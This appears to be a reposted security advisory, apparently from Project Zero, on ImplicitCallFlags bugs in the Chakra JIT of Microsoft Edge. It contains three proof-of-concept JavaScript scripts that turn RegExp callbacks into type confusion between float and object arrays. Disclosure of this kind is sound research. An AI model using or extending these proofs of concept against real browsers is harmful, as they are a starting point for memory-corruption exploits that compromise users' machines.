Microsoft Edge: Chakra: JIT: Multiple ImplicitCallFlags update bugs with RegExp
The same bug class with <a href="/p/project-zero/issues/detail?id=1334&quo Microsoft Edge: Chakra: JIT: Multiple ImplicitCallFlags update bugs with RegExp
The same bug class with <a href="/p/project-zero/issues/detail?id=1334" title="Microsoft Edge: Chakra: JIT: RegexHelper::StringReplace must call the callback function with updating ImplicitCallFlags" class="closed_ref" rel="nofollow"> issue 1334 </a>(MSRC-40170).
1. Calling RegExp.prototype.exec without updating the "ImplicitCallFlags" flag in "JavascriptRegExp::CallExec".
function opt(arr, re) {
arr[0] = 1.1;
'a'.match(re);
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
let re = /a/;
for (let i = 0; i < 0x2000; i++) {
opt(arr, re);
}
re.exec = function () {
arr[0] = {};
return null;
};
opt(arr, re);
print(arr[0]);
}
main();
2. Calling RegExp.prototype[Symbol.search] without updating the "ImplicitCallFlags" flag in "JavascriptString::CallRegExFunction".
function opt(arr, re) {
arr[0] = 1.1;
let r = 'a'.search(re);
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
let re = /a/;
for (let i = 0; i < 0x2000; i++) {
opt(arr, re);
}
re[Symbol.search] = function () {
arr[0] = {};
return 0;
};
opt(arr, re);
print(arr[0]);
}
main();
3. Calling Symbol.species without updating the "ImplicitCallFlags" flag in "RegexHelper::RegexEs6SplitImpl".
function opt(arr, re) {
arr[0] = 1.1;
'a'.split(re);
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
let re = /a/;
for (let i = 0; i < 0x2000; i++) {
opt(arr, re);
}
re.constructor = {
[Symbol.species]: function () {
arr[0] = {};
return /a/;
}
};
opt(arr, re);
print(arr[0]);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
Microsoft Edge Chakra JIT ImplicitCallFlags Update Bugs
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 403